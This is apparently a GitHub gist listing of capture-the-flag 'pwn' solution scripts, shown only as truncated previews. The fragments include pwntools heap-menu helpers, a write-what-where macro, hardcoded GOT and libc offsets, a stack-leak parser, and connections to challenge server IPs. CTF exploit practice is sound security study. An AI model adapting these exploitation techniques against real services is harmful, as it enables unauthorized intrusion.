Harsh khuha hkraw
hkraw
/ hxp_still_printf.py
Last active
December 24, 2020 13:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| from pwn import * | |
| from past.builtins import xrange | |
| from time import sleep | |
| import random | |
| import subprocess | |
| def PID(): | |
| print(subprocess.check_output(['pidof','still-printf'])) |
hkraw
/ one_shot.cc
Last active
March 7, 2021 23:12
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "gadgets.h" | |
| #include <iostream> | |
| #include <pwntools> | |
| #include <stdint.h> | |
| #include <string> | |
| #include <sys/time.h> | |
| #include <vector> | |
| #define www(where, what) \ | |
| io->sendlineafter("n = ", "-1"); \ |
hkraw
/ safecVector.cpp
Created
March 6, 2021 14:27
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <iostream> | |
| #include <pwntools> | |
| #include <stdint.h> | |
| #include <string> | |
| #include <sys/time.h> | |
| #include <vector> | |
| using namespace pwn; | |
| class Hack { |
hkraw
/ stopwatch.cpp
Last active
March 7, 2021 23:12
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <iostream> | |
| #include <pwntools> | |
| #include <stdint.h> | |
| #include <string> | |
| #include <sys/time.h> | |
| #include <vector> | |
| using namespace pwn; | |
| void play(Remote *io) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <pwntools> | |
| #include <string> | |
| #include <vector> | |
| #include <iostream> | |
| using namespace pwn; | |
| //auto io = Process("./a.out"); | |
| auto io = Remote("65.1.92.179", 49155); | |
| void add(uint32_t idx, uint32_t size, const std::string& bytes) { |
hkraw
/ No-output.py
Created
February 21, 2021 10:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from time import sleep | |
| def add(index,size,data): | |
| io.sendline("1") | |
| io.sendline(str(index)) | |
| io.sendline(str(size)) | |
| io.sendline(data) | |
| def edit(index,data): | |
| io.sendline("2") |
hkraw
/ wrong_locations.py
Created
February 21, 2021 10:36
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| if __name__ == "__main__": | |
| io = process("./a.out") | |
| io.sendlineafter("age: ","+") | |
| io.sendlineafter("n]: ","y") | |
| io.recvuntil("is ") | |
| stack_leak = int(io.recvuntil(",")[0:-1], 10) | |
| print(f"[+] Stack Leak: {hex(stack_leak)}") |
hkraw
/ notepad.cc
Created
February 20, 2021 10:29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <iostream> | |
| #include <pwntools> | |
| #include <string> | |
| #include <vector> | |
| using namespace pwn; | |
| uint64_t strlen_got = 0x409068; | |
| uint64_t libc_strlen = 0x18b660; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <iostream> | |
| #include <pwntools> | |
| #include <string> | |
| #include <vector> | |
| using namespace pwn; | |
| // auto io = Process("./FS-1"); | |
| auto io = Remote("13.126.21.122", 49160); | |
| void add(uint32_t idx, uint32_t size, const std::string &data, |
hkraw
/ house_of_rising_sun.py
Created
February 21, 2021 01:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| def add(idx, size, data,s='\n'): | |
| io.sendlineafter("exit"+s,"1") | |
| io.sendlineafter("index: ",str(idx)) | |
| io.sendlineafter("size: ",str(size)) | |
| io.sendafter("input: ",data) | |
| def edit(idx, data,s="\n"): | |
| io.sendlineafter("exit"+s,"2") |